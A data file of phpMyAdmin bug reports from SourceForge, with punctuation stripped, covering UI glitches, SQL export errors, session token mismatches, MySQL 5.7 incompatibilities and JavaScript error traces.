See the state system for ; > the name column is missing and the preceeding comma) MAMP version 3.0.7.2 server Apache 2.2.29 Unix) mod fastcgi 2.4.6 mod wsgi 3.4 Python 2.7.8 PHP 5.6.2 mod ssl 2.2.29 OpenSSL 0.9.8zc DAV 2 mod perl 2.0.8 Perl v5.20.0 PHP Version 5.6.2 Mysql Client API version 5.5.38 Please contact me for more info.
Original URL https sourceforge.net p phpmyadmin bugs 4798 Original author ggodart Found in version 4.3.12","bug"
"24444","11170","Position of sticky columns wrong when screen width too small.
There seems to be timing problem if you put a breakpoint in initStickyColumns ) in js sql.js, you can see that the items in floating menubar are not stacked like later when the page ready, but are in two or more rows.
Thus the height is too large, but is saved in fixedTop.
That results in the sticky header position when you scroll down being too far down leaving a gap see screenshot) Original URL https sourceforge.net p phpmyadmin bugs 4799 Original author rm km it Found in version Latest Git Attachment http sourceforge.net p phpmyadmin bugs 4799 attachment Bildschirmfoto 20vom 202015 03 12 2017 3A41 3A57.png","bug"
"24444","11171","New Create Table popup SUCKS.
The New Create Table popup SUCKS!!
please revert back to normal sane web behavior Original URL https sourceforge.net p phpmyadmin bugs 4801 Original author exile13 Found in version 3.4.7","bug"
"24444","11172","Show hidden items is sometimes hidden.
Let s say you have a database group for example, databases a a and a b) which are represented under a group a in the navi panel.
If you use the hide dimmed lightbulb icon to hide one of the tables inside of these databases, it gets hidden correctly but the yellow lightbulb icon Show hidden items does not appear next to the database name.
Original URL https sourceforge.net p phpmyadmin bugs 4803 Original author lem9 Found in version 4.3.12","bug"
"24444","11173","Undefined Index after export schema.
Hi all, using 4.3.11 with chrome 41.0.2272.89 64 bit) and mac os x yosemite 10.10.2.
Ixc2xb4m executing designer and method Export schema .
Download works, but when I open in the same google session the file, the drawing elements within the PDF are empty attachment 1).
After the download of the PDF the next operation will produce the log Notice in .
libraries plugins schema pdf Pdf Relation Schema.class.php 587 Undefined index foreign field.
Backtrace .
libraries plugins schema SchemaPdf.class.php 128 PMA Pdf Relation Schema > construct ) .
schema export.php 75 SchemaPdf >exportSchema string sam ) .
schema export.php 40 PMA processExportSchema string pdf ) attachment 2) When I open the same PDF within the MAC FINDER, its perfect showing up!
When I do the same procedure in MACs safari, effect no 1 does not appear PDF shows up perfect) but the notices undefined index) still there.
Original URL https sourceforge.net p phpmyadmin bugs 4804 Original author mollpete Found in version 4.3.11","bug"
"24444","11174","inline edit broken when using functions in query.
When issuing a SELECT FROM [table] , I can inline edit values.
However, if the query is something like SELECT , SHA1 [ ]) FROM [table] , it breaks.
I tested with 4.3.11.1, 4.3.12 and 4.4.0 demo server).
Reproduction CREATE TABLE IF NOT EXISTS `inlinetest` `id` int 11) NOT NULL, `msg` varchar 63) NOT NULL ) ENGINE=InnoDB AUTO INCREMENT=2 DEFAULT CHARSET=latin1; INSERT INTO `inlinetest` `id`, `msg`) VALUES 1, abc ); ALTER TABLE `inlinetest` ADD PRIMARY KEY `id`); Steps Browse the table using SELECT , SHA1 [msg]) FROM [inlinetest] .
The first thing I notice is that usually, there is an edit and delete link to edit delete a record.
This is not shown.
But still, inline edit is not disabled maybe this is the actual bug?).
Double click on msg .
Inline edit the value to something else.
Hit return.
The created SQL query contains an empty WHERE clause.
Click on edit in the error message and you can edit the broken SQL query.
Wait a few seconds and a new notification overlay pops up.
And this one seems to contain a browse query response.
tested in 4.3.12 dev In 4.4.0 beta1, a JavaScript error gets reported A fatal JavaScript error has occurred.
Would you like to send an error report?
Original URL https sourceforge.net p phpmyadmin bugs 4805 Original author ci dev Found in version 4.3.11","bug"
"24444","11175","Unable to work with two different databases in two tabs.
Hello, I just updated my phpMyAdmin from old 3.x version and found a very annoying bug.
I try to work with two databases in two diffent tabs.
But every action made in one tab destroys sessions in both tabs!
Example.
I open first database, log in and do something, that s good.
Next I open the second tab and switch to another database in left pane, log in to the second DB and see the start page.
From this point parallel work is impossible.
Trying to make something in first tab cause the Session expired.
Please log in error and I have to log in to first DB again.
But when I log in, the session in the second tab with second DB become invalid and trying to do anything case same error.
Different tokens in the browser s url field dont have any value.
How to work?
I think I will downgrade to version 3.x again.
First time I tried version 4.x I downgraded after 15 minutes... Now I tried it for a week.
Progress...
Original URL https sourceforge.net p phpmyadmin bugs 4806 Original author speller1 Found in version 4.3.12","bug"
"24444","11176","Breaks when sorting by multiple columns while using UNION.
It breaks when trying to sort by multiple columns when using UNION.
See, https sourceforge.net p phpmyadmin feature requests 262 ace5 9630 fa8e for more detail.
Original URL https sourceforge.net p phpmyadmin bugs 4807 Original author nisargjhaveri Found in version 4.3.12","bug"
"24444","11177","Can t unhide table from sub database.
I have a database named `ideal inv`, which is displayed as a tree, e.g.
`ideal > inv > ideal inv`.
I hid a table `users`), but no unhide icon shows up, as it does on the `test` database.
I m running `v4.3.11.1`.
Navigating to `http office phpmyadmin navigation.php?token=xyz showUnhideDialog=true dbName=ideal inv` fails with `Fatal error The navigation can only be accessed via AJAX` Original URL https sourceforge.net p phpmyadmin bugs 4808 Original author conquerthis Found in version 3.4.7 Attachment http sourceforge.net p phpmyadmin bugs 4808 attachment phpMyAdmin 20can 27t 20unhide.png","bug"
"24444","11178","nginx mysql hhvm phpmyadmin Stuck after login page all blank and token in the url.
nginx mysql 5.5 hhvm works fine.
i installed phpmyadmin with sudo apt get phpmyadmin and i have this version 4.2.6 1. after the login page from phpmyadmin i get a blank page something like this in the url phpmyadmin index.php?token=7e858f9ed3b783b34d4c2274d721f125 SID i get this error message in the hhvm error log \nFatal error Uncaught exception Exception with message Port is not numeric in \nStack trace \n 0 ) mysqli >real connect )\n 1 usr share phpmyadmin libraries dbi DBIMysqli.class.php 114) mysqli real connect )\n 2 usr share phpmyadmin libraries dbi DBIMysqli.class.php 191) PMA DBI Mysqli > realConnect )\n 3 usr share phpmyadmin libraries DatabaseInterface.class.php 2078) PMA DBI Mysqli >connect )\n 4 usr share phpmyadmin libraries common.inc.php 978) PMA DatabaseInterface >connect )\n 5 usr share phpmyadmin index.php 12) include )\n 6 {main} How can i fix this?
Original URL https sourceforge.net p phpmyadmin bugs 4809 Original author stefan563 Found in version 4.2.6","bug"
"24444","11179","Missing comma when export to SQL.
Hello, step to reproduce Create a table CREATE TABLE `aaa test` `testId` int 7) NOT NULL AUTO INCREMENT, `testUnix` varchar 12) COLLATE utf8 czech ci NOT NULL, `testDatum` timestamp NOT NULL DEFAULT CURRENT TIMESTAMP, `testUzivatel` int 5) NOT NULL, `testTema` int 6) NOT NULL COMMENT CONSTRAINT FOREIGN KEY testTema) REFERENCES aaa testtema testTemaId) , `testVazba` int 6) NOT NULL DEFAULT 0 COMMENT CONSTRAINT FOREIGN KEY testVazba) REFERENCES aaa test testId) , `testNadpis` varchar 80) COLLATE utf8 czech ci NOT NULL, `testText` text COLLATE utf8 czech ci, `testPovolit` int 1) NOT NULL DEFAULT 1 , `testPomocny` varchar 50) COLLATE utf8 czech ci DEFAULT NULL, `testDelka` int 10) DEFAULT NULL, `testNavstev` int 10) DEFAULT NULL, PRIMARY KEY `testId`), FULLTEXT KEY `testNadpis` `testNadpis`), FULLTEXT KEY `testText` `testText`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8 COLLATE=utf8 czech ci; During the subsequent export of this table comma is missing at the end of the row with column testUzivatel CREATE TABLE IF NOT EXISTS `aaa test` `testId` int 7) NOT NULL, `testUnix` varchar 12) COLLATE utf8 czech ci NOT NULL, `testDatum` timestamp NOT NULL DEFAULT CURRENT TIMESTAMP, `testUzivatel` int 5) NOT NULL `testNadpis` varchar 80) COLLATE utf8 czech ci NOT NULL, `testText` text COLLATE utf8 czech ci, `testPovolit` int 1) NOT NULL DEFAULT 1 , `testPomocny` varchar 50) COLLATE utf8 czech ci DEFAULT NULL, `testDelka` int 10) DEFAULT NULL, `testNavstev` int 10) DEFAULT NULL, PRIMARY KEY `testId`), FULLTEXT KEY `testNadpis` `testNadpis`), FULLTEXT KEY `testText` `testText`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8 COLLATE=utf8 czech ci; Tested with MySQL version 5.5.28 and 5.6.16.
PHP 5.5.21 Tested in browsers OS X Yosemite) Firefox 36.0.1 Chrome 41.0.2272.89 64 bit) Safari Version 8.0.3 The same behavior is also in version of phpMyAdmin 4.2.13.
PhpMyAdmin Version 4.1.13 exports in order.
Original URL https sourceforge.net p phpmyadmin bugs 4811 Original author jamesborgcz Found in version 4.3.12","bug"
"24444","11180","MySQL 5.7.6 and the Users menu tab.
I get this message Your privilege table structure seems to be older than this MySQL version!
Please run the mysql upgrade command mysql fix privilege tables on older systems) that should be included in your MySQL server distribution to solve this problem!
However this is a new MySQL 5.7.6 installation.
Original URL https sourceforge.net p phpmyadmin bugs 4813 Original author lem9 Found in version 4.4.0","bug"
"24444","11181","MySQL 5.7.6 and Databases.
After clicking on Databases 1055 Expression 1 of SELECT list is not in GROUP BY clause and contains nonaggregated column information schema.s.SCHEMA NAME which is not functionally dependent on columns in GROUP BY clause; this is incompatible with sql mode=only full group by Original URL https sourceforge.net p phpmyadmin bugs 4814 Original author lem9 Found in version 4.4.0","bug"
"24444","11182","Infinite calls to index.php.
After a brief period of inactivity, PMA makes an AJAX call to index.php once a second until either the server crashes or the page is updated somehow.
This wouldn t be a problem except that for whatever reason, if I leave PMA open over night or for an extended period of time, when I come back, it has borked my server so bad that I m forced to reboot my computer to get it working again.
I m not sure what the request is for, but I m pretty sure it doesn t need to run once a second until the end of time, if at all.
If I m not doing anything on the page, just leaving it open, there should be no reason to make any AJAX calls.
I understand that PMA is not a dynamically updating application, nor do I wish it to be.
If you need any other info, please let me know.
Original URL https sourceforge.net p phpmyadmin bugs 4815 Original author benjamwelker Found in version 4.3.12","bug"
"24444","11183","Ajax Notification [Loading...] updates ).
Sometimes when on a server, I try loading the loading a database table, the request aborts due to some reason like slow connectivity).
But the [Loading...] ajax notification remains there.
So first, that must be dismissed on a failed request, or may be it should be replaced by another dismissable notification saying Request Failed or so.
Let me know if this should be implemented and I ll implement it.
Thanks.
Original URL https sourceforge.net p phpmyadmin bugs 4817 Original author kushpf Found in version Next release","bug"
"24444","11184","MySQL 5.7.6 and changing the password for another user.
Produces a syntax error.
Original URL https sourceforge.net p phpmyadmin bugs 4818 Original author lem9 Found in version 4.4.0","bug"
"24444","11185","Request URI too large.
phpMyAdmin sometimes creates very large URIs when using the edit or delete funtions of the result set grid view.
Uppon submit, the web server complains Request URI too large .
I remember a time, when phpMyAdmin switched over from GET to POST requests for such long requests.
Is this still implemented?
A co worker even managed to get phpMyAdmin 4.3.11.1 to create a 90k !)
URI.
As far as I know HTTP RFC suggest a maximum URI length of 1k to 4k.
90k certainly is much too much.
I played around a bit on the demo server and getting a 2k URI is quite trivial to achieve.
Kind of reproduction 1) set up table according to attachment 2) issue query SELECT FROM `tbl` ORDER BY `id1` ASC,`id2` ASC,`val` DESC 3) select all records 4) with selected change The created URI is about 2.5k long.
Original URL https sourceforge.net p phpmyadmin bugs 4819 Original author ci dev Found in version 4.3.11 Attachment http sourceforge.net p phpmyadmin bugs 4819 attachment tbl.sql","bug"
"24444","11186","Timed out import fails to restart when file represented.
When importing a large file, phpMyAdmin can time out.
When this happens it shows a message something like import the file again and it will pick up where it left off .
This worked in previous versions, it is broken now, and has been for a couple of versions I think, When re importing the file it starts from the beginning and gives duplicate key error.
I thought I had reported this before, but although I ve looked for it I can t find it a My Tickets facility would be useful).
Attached are offending import and table structure to import into.
Where are all the platform settings?
This is with MariaDB 5 5 41, Fedora 20, FireFox 36.0 Original URL https sourceforge.net p phpmyadmin bugs 4821 Original author markstanton Found in version 4.3.12 Attachment http sourceforge.net p phpmyadmin bugs 4821 attachment SENT.TXT.zip","bug"
"24444","11187","Compress when php.ini output buffering is active.
It seems JSON) output isn t gzip) compressed.
Could you enable compression to reduce transfer time?
For example, I see server export.php has 1.6MB JSON output size..
Original URL https sourceforge.net p phpmyadmin bugs 4822 Original author olafvdspek Found in version 4.4.0","bug"
"24444","11188","INNODB STATUS page is empty.
SHOW INNODB STATUS does not work anymore SHOW ENGINE INNODB STATUS needs to be used https dev.mysql.com doc refman 5.0 en show innodb status.html https mariadb.com kb en mariadb show innodb status removed Original URL https sourceforge.net p phpmyadmin bugs 4824 Original author reaver56 Found in version 4.3.13","bug"
"24444","11189","TEXT formatting doesn t work after inline editing.
When I browse my pma userconfig table, the <tt>config data< tt> is syntax highlighted.
If I double click and inline edit some text there, the changed column appears in the standard black font.
Additionally, I m not sure if this syntax highlighting is specifically coded for the userconfig table, because I m not able to get any other table to nicely format and change colors; even if I copy this same table to another database the result is standard black text.
I m not sure if that s a bug or a feature.
Image attached Original URL https sourceforge.net p phpmyadmin bugs 4827 Original author ibennetch Found in version 4.4.0 Attachment http sourceforge.net p phpmyadmin bugs 4827 attachment Screen 20Shot 202015 03 31 20at 2010.27.27 20PM.png","bug"
"24444","11190","JavaScript is loaded in wrong order.
Sometimes, when refreshing a page, users occur errors like `Error Token Mismatch` or `Uncaught ReferenceError ... is not defined` because phpMyAdmin does not initialize properly.
When navigating from one page to another this problem does not occur because a part of the old session is being preserved.
For example, if I refresh a Browse page I get the errors you can see in the attached screenshot.
I think that one error is the cause for the other one.
In my situation, `CodeMirror` is required, but it does not exist so it tries to send an error report via `error report.php`.
A valid error report requires a token that has not been set yet because `PMA commonParams.setAll { token ... })` is called after.
Original URL https sourceforge.net p phpmyadmin bugs 4828 Original author udan11 Found in version 4.4.0 Attachment http sourceforge.net p phpmyadmin bugs 4828 attachment 2015 04 02 00 09 22.png","bug"
"24444","11191","Create procedure via SQL Editor not more possible.
It s not more possible to create a function or procedure using SQL Editor.
It hangs up without error.
I mean for example DELIMITER CREATE FUNCTION `test` `p hd nr` INT 6), `p date` VARCHAR 10)) RETURNS decimal 4,2) DETERMINISTIC BEGIN declare `rating vorschlag hymer` DECIMAL 4,2); declare `hd land` VARCHAR 20); .... end Original URL https sourceforge.net p phpmyadmin bugs 4829 Original author arnaud2013 Found in version 4.4.0","bug"
"24444","11192","Maximum execution time exceeded in Util.class.php.
This is 4.4.0 but that milestone is missing.
When attempting to browse a certain table 2015 04 02 13 31 18 mod fastcgi.c.2695) FastCGI stderr PHP Fatal error Maximum execution time of 30 seconds exceeded in srv router phpMyAdmin 4.4.0 english libraries dbi DBIMysqli.class.php on line 594 2015 04 02 13 32 03 mod fastcgi.c.2695) FastCGI stderr PHP Fatal error Maximum execution time of 30 seconds exceeded in srv router phpMyAdmin 4.4.0 english libraries Util.class.php on line 295 2015 04 02 13 35 17 mod fastcgi.c.2695) FastCGI stderr PHP Fatal error Maximum execution time of 30 seconds exceeded in srv router phpMyAdmin 4.4.0 english libraries Util.class.php on line 302 Original URL https sourceforge.net p phpmyadmin bugs 4830 Original author olafvdspek Found in version 4.4.3","bug"
"24444","11193","Recaptcha API v2.
Can the new recaptcha API v2) be added to phpMyAdmin please ?
Few months ago Google released API v2, which is more secure than the actual API v1 https www.google.com recaptcha intro index.html Thanks Original URL https sourceforge.net p phpmyadmin bugs 4831 Original author demlasjr Found in version 4.4.0","bug"
"24444","11194","Sorting distinct values result loses links.
The Structure page has a Distinct value command.
If you use this command, the results are clickable and link to a search page.
These links are lost when you sort the result.
Original URL https sourceforge.net p phpmyadmin bugs 4832 Original author olafvdspek Found in version 4.4.0","bug"
"24444","11195","Do not attach token to css requests to improve caching.
Original URL https sourceforge.net p phpmyadmin bugs 4834 Original author madhuracj Found in version 4.4.0","bug"
"24444","11196","server warning after moving from console to Direct clicks.. After opening a table and pressing Explain and Clear in console window , and opening another Databases s table results in server warning.
warning messages be seen at http dpaste.com 177GX8Y screen shot at https unsee.cc tenupobi Original URL https sourceforge.net p phpmyadmin bugs 4836 Original author sukhtaaj Found in version Latest Git","bug"
"24444","11197","Duplicate new version notification when using the Back button.
When I first arrive on the main page of my phpmyadmin server, I have, at the bottom of the page the text Une nouvelle version de phpMyAdmin est disponible et vous devriez songer xc3xa0 une mise xc3xa0 niveau.
La version la plus rxc3xa9cente est 4.4.0, publixc3xa9e le 2015 04 01.
A new version of phpMyAdmin is available... blalbla ... latest version) This fine and great.
If I display another page and press the Back button of my browser FF 36.0.4), then the information message is displayed twice.
If I leave again, and press back again, then it appears 3 times...
The notification should always be displayed only once.
Original URL https sourceforge.net p phpmyadmin bugs 4837 Original author tititou Found in version 4.4.0","bug"
"24444","11198","Prevents console window from moving out of the screen height.
Console window moves out of the screen when expanded upwards and there is no way to bring it back.
Which leaves the user puzzled for how to get back the normal view.
And remains the same even after logging in again.
Original URL https sourceforge.net p phpmyadmin bugs 4838 Original author sukhtaaj Found in version 4.4.1 Attachment http sourceforge.net p phpmyadmin bugs 4838 attachment console window Bug.png","bug"
"24444","11199","DOC link in setting is broken.
Setting link in sub bookmark called Name of pages in bookmark Functions seems broken.
Link doesn t work properly http localhost phpmyadmin doc html cfg.html cfg TitleTable Original URL https sourceforge.net p phpmyadmin bugs 4839 Original author jpalider Found in version 4.4.0 Attachment http sourceforge.net p phpmyadmin bugs 4839 attachment V C3 BDst C5 99i C5 BEek.JPG","bug"
"24444","11200","Only able to use 1 computer behind firewall.
I am having interesting issue with phpmyadmin using a single login.
Specs OS X lion, Apache, php 5.3, phpMyAdmin 4.4.0 all languages.zip, VPN, Firefox I have a server that I use as a testing server that I connect to on a VPN from behind my firewall at home.
When I do this I am either on my laptop or desktop depending what I am doing.
I installed phpmyadmin and it seemed fine till I switched computers.
After a fresh install I can login and all looks well but when I login from my other system I get the following error on my system Fatal error Cannot redeclare PMA Bookmark getParams ) previously declared in path to root phpMyAdmin libraries bookmark.lib.php 21) in path to root phpmyadmin libraries bookmark.lib.php on line 40 .
The interesting part is that I can another browser and it works fine on the computer that was having issues.
Original URL https sourceforge.net p phpmyadmin bugs 4840 Original author mav2287 Found in version 4.4.0","bug"
"24444","11201","Status page Mislukte pogingen per uur value is incorrect.
I have encountered a problem.
The status page of my mySQL database shows the following Deze MySQL server draait inmiddels 0 dagen, 2 uren, 0 minuten en 2 seconden.
Deze is gestart op 05 apr 2015 om 23 59. nbsp; | Verbindingen | xc3xb8 per uur | | | | Max.
gelijktijdige verbindingen | 7 | | Mislukte pogingen | 1 | <0.01 | 0,12 Afgehaakte | 12 | 6 | 1,49 Totaal | 803 | 401,39 | 100,00 As you can see, the server runs for about 2 hours.
Therefore the xc3xb8 per uur column should show values of about half that of the Verbindingen column.
This is indeed true for the Afgehaakte row, and also almost for the Totaal row, but the Mislukte pogingen row shows a very weird xc3xb8 per uur value.
It should be around 0,50.
Moreover, it uses a dot instead of a comma which is normally the setting for the decimal separator in the Netherlands).
I am running a XAMPP server 5.6.3 which uses MySQL 5.6.21 and phpMyAdmin 4.2.11 It runs on a Windows 8.1 64bit pc and I am viewing phpMyAdmin from my Firefox 36.0.4 browser.
Original URL https sourceforge.net p phpmyadmin bugs 4841 Original author coolcat007 Found in version 4.2.11","bug"
"24444","11202","jquery.cookie.js triggers default Apache mod security rules.
The header of javascript loader getting error 406 in some linux distribution.
I believe its for mod security.
The main file that cause problem is js jquery jquery.cookie.js This problem was identified and discussed in many forum.
Like https forum.jquery.com topic jquery cookie js triggers default apache mod security rules So, I made a small hack of core file libraries\Header.class.php on PMA Header addDefaultScripts ) method.
I just rename the above file [as many other suggested to this > scripts >addFile jquery jquery cookie.js );] that solve my issue i.e.
I just rename that file from jquery.cookie.js to jquery cookie.js that solves the issue.
Hope phpMyAdmin team will solve this problem in next release.
Thanks Original URL https sourceforge.net p phpmyadmin bugs 4842 Original author razonklnbd Found in version 3.5.1","bug"
"24444","11203","FF and IE shows white page because display none style.
It s a similar issue like described in 4574 but difference is that javascript isn t disabled.
I use phpMyAdmin version 3.5.2 on my Debian server with Apache.
It still works.
But if I install the newer version in same directory var www phpMyAdmin it doesn t work.
My first reaction was to search a permission problem but Apache has access.
The phpMyAdmin setup works and is displayed correctly.
All the hints in internet to change permissions, play with config absolute uri didn t help.
Then I saw in release note 3.1 that display is set to none if there is no default config available.
But I checked it an it s there.
I tried with version 4.3 and 4.2 also but negative also.
After several hours trying I went back to 3.5.2 and I hope that somebody knows about this issue.
I was confused about the change in 3.1.
I would never hide something without an error message.
Original URL https sourceforge.net p phpmyadmin bugs 4843 Original author enrica r Found in version 4.4.0","bug"
"24444","11204","FAQ 1.17 needs an update.
Original URL https sourceforge.net p phpmyadmin bugs 4844 Original author lem9 Found in version 4.4.0","bug"
"24444","11205","White screen Cloudflare).
Seeing white screen when attempting to view the main index login screen with Chrome 41.0.2272.118 64 bit) on Yosemite 10.10.2.
Safari and Firefox both work fine.
Incognito doesn t work either.
PHP version 5.6.6.
Cannot seem to find anyone reporting something similar.
Please let me know if you need additional info.
Original URL https sourceforge.net p phpmyadmin bugs 4845 Original author staze Found in version 4.4.2","bug"
"24444","11206","Web server s error log is flooded.
Hello, after upgrading one of my systems from pma 4.3.13 to 4.4.1 my php error log is flooded with the following lines whenever a pma page is loaded [...] [08 Apr 2015 16 22 21 Asia Bangkok] clean [08 Apr 2015 16 22 20 Asia Bangkok] clean [08 Apr 2015 16 21 53 Asia Bangkok] clean [08 Apr 2015 16 21 39 Asia Bangkok] clean [...] Best wishes Michael Original URL https sourceforge.net p phpmyadmin bugs 4846 Original author schattenfell Found in version 4.4.1","bug"
"24444","11207","Some query take very long time.
Hi, some query, like a simple Select from TABLE GROUP BY Fields1,Fields2 take like 3 4 minutes to show, when it show up it write Showing rows ... Query took 0.0418 seconds.)
if I enable profiling on this query, I got errors Notice in .
libraries sql.lib.php 420 Undefined index time Backtrace .
libraries sql.lib.php 345 PMA analyzeAndGetTableHtmlForProfilingResults array) .
libraries sql.lib.php 2033 PMA getHtmlForProfilingChart NULL, string Dispatch Mysql , array, ) .
libraries sql.lib.php 2242 PMA getQueryResponseForResultsReturned object, array, string Dispatch Mysql , string TC Horaire , NULL, NULL, object, string .
themes pmahomme img , string 30 , integer 25, string SELECT FROM `TC Horaire` GROUP BY Numero,Type LIMIT 0, 25 , NULL, NULL, array, NULL, NULL, string SELECT FROM `TC Horaire` GROUP BY Numero,Type , NULL, ) .
import.php 717 PMA executeQueryAndGetQueryResponse array, boolean false, string Dispatch Mysql , string TC Horaire , NULL, string SELECT FROM `TC Horaire` GROUP BY Numero,Type , NULL, boolean false, NULL, NULL, NULL, string tbl structure.php , string .
themes pmahomme img , NULL, NULL, NULL, string SELECT FROM `TC Horaire` GROUP BY Numero,Type , NULL, NULL, ) Original URL https sourceforge.net p phpmyadmin bugs 4847 Original author jfdionne Found in version 4.4.1","bug"
"24444","11208","PHP errors in login dialogue.
I have a multi server setup, so I use cfg[ ServerDefault ] = 0; in my configuration file.
This already lead to some problems, so I just want to make sure I mention this.
Reproduction open phpMyAdmin root installation General Settings page is shown, the theme can be selected and a server can be selected select a server Replication Master in my case) the actual login screen is shown along with an error see attachment Reproduction 2 open phpMyAdmin root installation in another tab General Settings page is shown, the theme can be selected and a server can be selected select the same server as in reproduction There is no login screen anymore, as the session is still valid.
The PHP warnings are shown in the main window on the right.
Same warnings as before.
Original URL https sourceforge.net p phpmyadmin bugs 4851 Original author ci dev Found in version 4.4.1 Attachment http sourceforge.net p phpmyadmin bugs 4851 attachment pma login.png","bug"
"24444","11209","No CodeMirror Highlighting.
Ever since upgrading to 4.4, and most recently in 4.4.2, CodeMirror syntax highlighting and auto complete is not working.
The CodeMirror JS appears to load correctly but there is no syntax highlighting.
This is what the request looks like that loads JS https localhost database js get scripts.js.php?scripts 5B 5D=jquery jquery 1.11.1.min.js scripts 5B 5D=sprintf.js scripts 5B 5D=ajax.js scripts 5B 5D=keyhandler.js scripts 5B 5D=jquery jquery ui 1.11.2.min.js scripts 5B 5D=jquery jquery.cookie.js scripts 5B 5D=jquery jquery.mousewheel.js scripts 5B 5D=jquery jquery.event.drag 2.2.js scripts 5B 5D=jquery jquery ui timepicker addon.js scripts 5B 5D=jquery jquery.ba hashchange 1.3.js scripts 5B 5D=jquery jquery.debounce 1.0.5.js scripts 5B 5D=menu resizer.js scripts 5B 5D=cross framing protection.js scripts 5B 5D=rte.js scripts 5B 5D=doclinks.js scripts 5B 5D=functions.js scripts 5B 5D=navigation.js scripts 5B 5D=indexes.js scripts 5B 5D=common.js scripts 5B 5D=makegrid.js scripts 5B 5D=jquery jquery.uitablefilter.js scripts 5B 5D=sql.js scripts 5B 5D=codemirror lib codemirror.js scripts 5B 5D=codemirror mode sql sql.js scripts 5B 5D=codemirror addon runmode runmode.js scripts 5B 5D=codemirror addon hint show hint.js scripts 5B 5D=codemirror addon hint sql hint.js scripts 5B 5D=console.js CodeMirror is enabled.
Original URL https sourceforge.net p phpmyadmin bugs 4852 Original author oparrish Found in version 4.4.2 Attachment http sourceforge.net p phpmyadmin bugs 4852 attachment NoCodeMirror.jpg","bug"
"24444","11210","Relation view between 1600 and 1780 px.
See attachment.
Thanks for job!
Original URL https sourceforge.net p phpmyadmin bugs 4853 Original author greenpeas26 Found in version 4.4.2 Attachment http sourceforge.net p phpmyadmin bugs 4853 attachment pma1600 1780.png","bug"
"24444","11211","Error Token mismatch when using multiple servers in parallel.
When trying to use phpMyAdmin with multiple servers simultaniously, I get a Error Token mismatch for the previous server.
reproduction steps Have phpMyAdmin set up with multiple servers.
Start phpMyAdmin and log into server 1 you see the main screen.
At the lower right of the right window, there is an icon Open new phpMyAdmin window click it to open a new phpMyAdmin window.
The window now shows the main screen of server 1 in another window.
In General Settings on the main screen, a Current Server drop down allows selecting another server.
Select server 2 .
Log into server 2 .
You see the main screen of server 2 in the previously opened new window.
Activate the first window again which shows the main screen of server 1 .
Nearly any action done there results in Error Token mismatch .
PS I have a multi server setup, so I use cfg[ ServerDefault ] = 0; in my configuration file.
Original URL https sourceforge.net p phpmyadmin bugs 4854 Original author ci dev Found in version 4.4.2","bug"
"24444","11212","Fatal javascript encounter.
step to reprocedure 1 enter root phpmyadmin url authentication config root user 2 From left panel, choose a DB, click new to create new table 3 In table creation form enter 2 columns first named id or whatever) type int, choose primary confirm the modal popup, then check the AI checkbox auto inc) second named name or whatever), type int 4 Save got fatal error In that stage, we can not browse any link, table, server, DB.
We have to reload page to continue using phpmyadmin detail of js error << { pma version 4.4.2 , browser name CHROME , browser version 41.0.2272.76 , user os Mac , server software Apache 2.4.10 Unix) PHP 5.5.20 , user agent string Mozilla 5.0 Macintosh; Intel Mac OS X 10 10 3) AppleWebKit 537.36 KHTML, like Gecko) Chrome 41.0.2272.76 Safari 537.36 , locale en , configuration storage disabled , php version 5.5.20 , exception type js , exception { mode stack , name TypeError , message undefined is not a function , stack [ { line 235, func , context [ lastException = null; , notifyHandlers.apply null, [stack, null].concat args)); , } , }, stack.incomplete ?
2000 0)); , , throw ex; re throw to propagate to the top level and cause wind ... , } , , report.subscribe = subscribe; , report.unsubscribe = unsubscribe; , return report; ], filename tracekit tracekit.js }, { func HTMLDocument.<anonymous> , line 98, column 38 , context [ , , Unbind all event handlers before tearing down a page , , AJAX.registerTeardown tbl structure.js , function ) { , \ a.change column anchor.ajax\ ).die click ); , \ button.change columns anchor.ajax, input.change columns anchor.ajax\ ... , \ a.drop column anchor.ajax\ ).die click ); , \ a.add primary key anchor.ajax\ ).die click ); , \ a.add index anchor.ajax\ ).die click ); , \ a.add unique anchor.ajax\ ).die click ); ], filename tbl structure.js }, { func HTMLDocument.new func , line 277, column 33 , context [ , wrap function function func) { , if !func.wrapped) { , var new func = function ) { , try { , return func.apply this, arguments); , } catch x) { , TraceKit.report x); , } , }; , new func.wrapped = true; ], filename error report.js }, { func HTMLDocument.m.event.dispatch , line 3, column 8436 , context [ !
jQuery v1.11.1 | c) 2005, 2014 jQuery Foundation, Inc. | jquery.org li ... , !function a,b){\ object\ ==typeof module \ object\ ==typeof module.exports?mod ... , if k j[k] e||j[k].data)||void 0!==d||\ string\ !=typeof b)return k|| k=i?a ... , },cur function ){var a=Zb.propHooks[this.prop];return a a.get?a.get this) ... , ; , , function sprintf ) { , ], filename jquery jquery 1.11.1.min.js }, { func HTMLDocument.
event.dispatch , line 374, column 19 , context [ event.dispatch = function event ){ , \tif .data this, \ suppress.\ event.type ) new Date ).getTime ) > 0 ){ , \t\t .removeData this, \ suppress.\ event.type ); , \t\treturn; , \t} , \treturn dispatch.apply this, arguments ); , }; , , event fix hooks for touch events... , var touchHooks = , event.fixHooks.touchstart = ], filename jquery jquery.event.drag 2.2.js }, { func HTMLDocument.r.handle , line 3, column 5146 , context [ !
jQuery v1.11.1 | c) 2005, 2014 jQuery Foundation, Inc. | jquery.org li ... , !function a,b){\ object\ ==typeof module \ object\ ==typeof module.exports?mod ... , if k j[k] e||j[k].data)||void 0!==d||\ string\ !=typeof b)return k|| k=i?a ... , },cur function ){var a=Zb.propHooks[this.prop];return a a.get?a.get this) ... , ; , , function sprintf ) { , ], filename jquery jquery 1.11.1.min.js }, { func Object.m.event.trigger , line 3, column 7537 , context [ !
jQuery v1.11.1 | c) 2005, 2014 jQuery Foundation, Inc. | jquery.org li ... , !function a,b){\ object\ ==typeof module \ object\ ==typeof module.exports?mod ... , if k j[k] e||j[k].data)||void 0!==d||\ string\ !=typeof b)return k|| k=i?a ... , },cur function ){var a=Zb.propHooks[this.prop];return a a.get?a.get this) ... , ; , , function sprintf ) { , ], filename jquery jquery 1.11.1.min.js }, { func m.fn.extend.triggerHandler , line 3, column 15485 , context [ !
